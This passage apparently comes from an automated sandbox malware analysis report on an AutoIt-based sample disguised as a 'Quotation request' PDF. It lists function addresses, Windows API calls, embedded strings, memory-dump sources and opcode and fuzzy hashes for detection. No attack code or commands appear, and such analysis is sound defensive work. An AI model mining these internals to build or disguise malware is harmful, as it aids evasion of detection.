                                                                    • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                    Function 03263678 Relevance: .1, Instructions: 92COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: afa90e7e472980e876498869805817a143d9d349feb06f7846e97a6dda6f658b
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: EC41C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                    Function 03263508 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: 358cef88a7ed1250e3ea5542a4536edf8c07012fd331672b5f881233d6e74664
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: 8E019278A10609EFCB48DF98C5909AEF7B5FF48310F248599D919A7311D730AE81DB80
                                                                    Function 03263568 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: cd7ff6470c1df0abad5b99f64709cbd480ec4a2bdf8d4bf29f52562a337fca84
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: 56019278A10209EFCB44DF98C5909AEF7B5FF8C310F248599D919A7351D730AE91DB80
                                                                    Function 03261EB8 Relevance: .0, Instructions: 6COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1301186731.0000000003260000.00000040.00000020.00020000.00000000.sdmp, Offset: 03260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_3260000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DeleteObject.GDI32(?), ref: 0045953B
                                                                    • DeleteObject.GDI32(?), ref: 00459551
                                                                    • DestroyWindow.USER32(?), ref: 00459563
                                                                    • GetDesktopWindow.USER32 ref: 00459581
                                                                    • GetWindowRect.USER32(00000000), ref: 00459588
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                    • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                    • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                    • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                    • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                    • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                    • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                    • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                    • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                    • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                    • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                    • _wcslen.LIBCMT ref: 00459916
                                                                    • _wcscpy.LIBCMT ref: 0045993A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                    • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                    • GetDC.USER32(00000000), ref: 004599FC
                                                                    • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                    • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                    • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 4040870279-2373415609
                                                                    • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                    • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                    • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                    • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                    Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(00000012), ref: 0044181E
                                                                    • SetTextColor.GDI32(?,?), ref: 00441826
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                    • GetSysColor.USER32(0000000F), ref: 00441849
                                                                    • SetBkColor.GDI32(?,?), ref: 00441864
                                                                    • SelectObject.GDI32(?,?), ref: 00441874
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                    • GetSysColor.USER32(00000010), ref: 004418B2
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                    • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                    • DeleteObject.GDI32(?), ref: 004418D5
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                    • FillRect.USER32(?,?,?), ref: 00441970
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                      • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                      • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                      • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                      • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                      • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                      • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                      • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                      • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                      • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                      • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                    • String ID:
                                                                    • API String ID: 69173610-0
                                                                    • Opcode ID: 9cbb2e0e6e9bc8cc5086cec67c9521896feea0bdb3ddff116a010ae3a32032cf
                                                                    • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                    • Opcode Fuzzy Hash: 9cbb2e0e6e9bc8cc5086cec67c9521896feea0bdb3ddff116a010ae3a32032cf
                                                                    • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                    Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                    Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-3360698832
                                                                    • Opcode ID: 7534ac369bce7e38ff114bad5cf0846739f07f60f75e82906ed6ff2ebc51d02e
                                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                    • Opcode Fuzzy Hash: 7534ac369bce7e38ff114bad5cf0846739f07f60f75e82906ed6ff2ebc51d02e
                                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                    Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load
                                                                    • String ID:
                                                                    • API String ID: 1675784387-0
                                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                    Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1582027408-0
                                                                    • Opcode ID: 5d65719131e179a9f74a9095f7d89cc9a0806716ec67b872349150954db9c409
                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                    • Opcode Fuzzy Hash: 5d65719131e179a9f74a9095f7d89cc9a0806716ec67b872349150954db9c409
                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                    Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 3217815495-966354055
                                                                    • Opcode ID: 144d0bb69c17a5380bae361c8772a2c4dadfb7b41544130593d4324b44590eb2
                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                    • Opcode Fuzzy Hash: 144d0bb69c17a5380bae361c8772a2c4dadfb7b41544130593d4324b44590eb2
                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                    Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                    • DestroyWindow.USER32(?), ref: 00456746
